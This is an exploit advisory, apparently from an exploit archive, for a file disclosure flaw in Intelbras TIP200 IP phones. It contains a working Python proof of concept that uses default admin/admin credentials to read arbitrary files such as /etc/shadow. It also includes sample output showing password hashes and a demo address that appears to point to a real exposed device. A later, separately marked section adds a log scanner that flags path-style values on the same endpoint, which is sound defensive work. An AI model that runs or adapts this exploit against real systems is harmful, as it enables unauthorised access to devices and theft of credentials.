Intelbras Telefone Local File Disclosure

2018.03.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Intelbras Telefone Local File Disclosure
# Shodan: Intelbras Telefone IP TIP200 LITE
# Date: 21/03/2018
# Tested: w10
# Credit: Informacion - Anonymous
# Authors: Matheus Goncalves - anhax0r
# Version: [60.0.75.29] (REQUIRED)
# Exploit:

# Python 2 script (uses raw_input).
import requests as http
from requests.auth import HTTPBasicAuth

def poc():
    print("""
-------------------------------------------------------------------------------------------------------------
------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
-------------------------------------------------------------------------------------------------------------\n""")
    filename = raw_input("filename Ex: /etc/shadow: -> ")
    if filename == "":
        filename = "/etc/shadow"
    # The CGI handler returns whatever file the "page" parameter names.
    r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page=" + str(filename),
                 auth=HTTPBasicAuth('admin', 'admin'))
    print(" ")
    text = r.text
    print(text)
    savefile = raw_input("Save file? [Y\\n]: ").upper()
    if savefile == "Y":
        # Write the response directly; the original passed it to "echo" through
        # os.system, which ran device-controlled text in the local shell.
        with open(filename.replace("/etc/", ""), "wb") as out:
            out.write(text.encode("utf-8"))
        print("File saved !!")
        start()
    else:
        start()

def start():
    poc()

start()

#root@hax:~/itscanner# python p0c.py
# -------------------------------------------------------------------------------------------------------------
# ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
# ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
# -------------------------------------------------------------------------------------------------------------
#filename Ex: /etc/shadow: -> /etc/shadow
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
#Save file? [Y\n]: y
#File saved !!
#root@hax:~/itscanner# cat shadow
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
# Dem0: - http://177.135.140.143
####################################################
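
Added example (not part of the original advisory or the authors' PoC): a log check for the request pattern the PoC sends, that is, a "page" value on /cgi-bin/cgiServer.exx that is a filesystem path rather than a page name. The Common Log Format input (from a proxy or sensor in front of the phone), the sample lines and the page name Status.htm are constructed assumptions; the traversal and nested-encoding cases go beyond the absolute path shown in the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/cgi-bin/cgiServer.exx"  # endpoint requested by the PoC
PARAM = "page"                       # parameter that carries the file name
# Source address, request target and status of a Common Log Format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (assumed format, not captured from a real device).
SAMPLE_LOG = """\
192.0.2.10 - admin [21/Mar/2018:10:01:02 +0000] "GET /cgi-bin/cgiServer.exx?page=Status.htm HTTP/1.1" 200 5120
198.51.100.7 - admin [21/Mar/2018:10:03:41 +0000] "GET /cgi-bin/cgiServer.exx?page=/etc/shadow HTTP/1.1" 200 98
198.51.100.7 - admin [21/Mar/2018:10:03:55 +0000] "GET /cgi-bin/cgiServer.exx?page=%252Fetc%252Fpasswd HTTP/1.1" 200 412
203.0.113.5 - - [21/Mar/2018:10:05:00 +0000] "GET /cgi-bin/cgiServer.exx?page=../../etc/passwd HTTP/1.1" 401 0
192.0.2.10 - admin [21/Mar/2018:10:06:12 +0000] "GET /index.htm?page=/etc/shadow HTTP/1.1" 404 0
"""

def classify(value):
    """Return why a page value is suspicious, or None if it looks like a page name."""
    for _ in range(3):  # peel nested URL-encoding such as %252F
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if value.startswith("/"):
        return "absolute path"
    if ".." in value.replace("\\", "/").split("/"):
        return "directory traversal"
    return None

def scan(log_text):
    """Return (source, status, page value, reason) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, target, status = m.groups()
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        for value in parse_qs(url.query).get(PARAM, []):
            reason = classify(value)
            if reason:
                hits.append((src, int(status), value, reason))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request answered with status 200 is the one to investigate first, since the device returned content for that path.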

References:

https://cxsecurity.com/issue/WLB-2018030168
https://www.exploit-db.com/exploits/44317/
https://www.facebook.com/Informacion-Anonymous-611394289006994/

